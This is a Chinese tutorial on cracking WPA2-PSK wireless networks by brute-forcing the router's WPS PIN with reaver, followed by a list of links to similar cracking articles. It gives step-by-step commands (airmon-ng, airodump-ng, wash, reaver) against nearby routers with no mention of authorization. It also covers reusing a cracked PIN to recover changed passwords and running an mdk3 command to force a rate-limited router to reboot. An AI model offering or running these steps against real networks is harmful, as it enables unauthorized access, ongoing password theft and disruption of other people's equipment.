使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络
【前言】
现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。
【操作步骤】
1、切换无线网卡到监听模式:
airmon-ng start wlan0
2、刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到):
airodump-ng wlan0mon
3、找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址):
wash -i wlan0mon
3、开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v):
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv
参数说明:
-i 无线网卡名称
-b 目标AP的mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-vv 显示更多的非严重警告(注意这是 2 个小写字母 v)
-d 即delay每穷举一次的闲置时间 预设为1秒
-c 信道编号
-p PIN码四位或八位 //可以用8位直接找到密码。
4、等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,我当时花费了 12 个小时才破解出来),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息:
破解完成后,查看并记录下 PIN码 和 密码:
5、获取到 PIN码 后,以后即便路由器更换了密码,我们也可以很迅速地通过 PIN码 重新获得新密码。以上方获取到的信息举例:
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977
【注意事项】
1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。
2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。
使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络相关推荐
- 关于pin码破解的原理和reaver参数的解释
路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举pin码,达到破解的目的,尤其现在很多路由器默认开启了wps功能.大家可能会想到8位的随机pin码将会有100000000种情况,这要 ...
- BackTrack5利用路由PIN码破解无线路由WPA2密钥
airmon-ng start wlan0 //将无线网卡设置为监控模式 airodump-ng -i mon0 //获得周围无线路由信息 wash -i mon0 -C //查看支持 ...
- BackTrack5 PIN码破解无线路由器
首先PIN 码破解五点要求: 1. 目标路由器开启 WPS 功能 2. 信号质量要好 3. 信号质量要好 4. 信号质量要好 5. 信号质量要好 0. 如果你用的高增益天线 如
- 使用Aircrack-ng工具破解WEP、WPA/WPA2加密的无线网络
特别声明:本文是参照"9.2 使用Aircrack-ng工具破解无线网络"进行实验的.链接为:https://wizardforcel.gitbooks.io/daxueba-ka ...
- 破解WEP和WPA加密的无线网络
今天讲讲Aircrack-ng,这是一个基于破解无线802.11协议的wep及wpa-psk加密的工具.补充一点,这种破解方法是在网卡的基础上进行的. 破解wep加密的无线网络:现在命令行输入airm ...
- 3-AT命令交互之-PIN码
PIN码,全称Personal Identification Number.就是SIM卡的个人识别密码.PUK码全称PIN Unlocking Key,是PIN码的解锁码,PIN码一般在修改前原始密码 ...
- wifi密钥破解(WPA2/PSK)
0 这里本应该写一点关于WLAN协议的知识, 暂且略过 开启网卡监听模式 airmon-ng start wlan0 开启监听模式 捕获空气中的数据包 airodump-ng wlan0mon 捕获的 ...
- java跑pin码,reaver跑pin码wpc文件的修改
reaver跑路由器pin码过程:(root权限下) 1 输入:airmon-ng start wlan0 开启监听模式 2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间 ...
- 无线网络渗透测试-使用Aircrack-ng工具破解无线网络
破解WEP加密的无线网络 Wired Equivalent Privacy或WEP(有线等效加密)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络.不过密码分析学家 ...
- Kali-linux使用Aircrack-ng工具破解无线网络
Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具.该工具主要用了两种攻击方式进行WEP破解.一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(S ...
最新文章
- 窗体 局部变量转换为全局_Unity 热更新解决方案 学习笔记(12)Lua 全局变量和局部变量...
- 【程序员归家计划】放假回家之前拜服务器?不存在的,这才是保证程序员过好年的正确打开方式...
- FutureTask 实现预加载数据 在线看电子书、浏览器浏览网页等
- Silverlight 解谜游戏 之十三 游戏暗示(2)
- 计算机二级c语言公共基础题,计算机二级C语言笔试公共基础知识课后习题及答案...
- 文字穿插在海报设计中的不同用法
- 手机怎样才能接收到五公里外的WiFi信号?
- edraw max for mac(亿图图示 mac)
- 【方向盘】使用IDEA的60+个快捷键分享给你,权为了提效(运行/调试篇)
- MAC 如何快捷截图
- C/C++ 银行账户管理系统
- ipq wifi校准
- 如何画双层和四层的PCB
- 我的HTML学习------表格的基本使用
- 脚本引流的震撼效果是真的么?脚本引流的话术真的重要?
- 多线程使用场景(经典必看)
- Java——File(文件)
- SSM在线车队货车管理系统
- CPRI原理及应用--基本原理
- 微信支付宝支付如何盈利?盈利如何?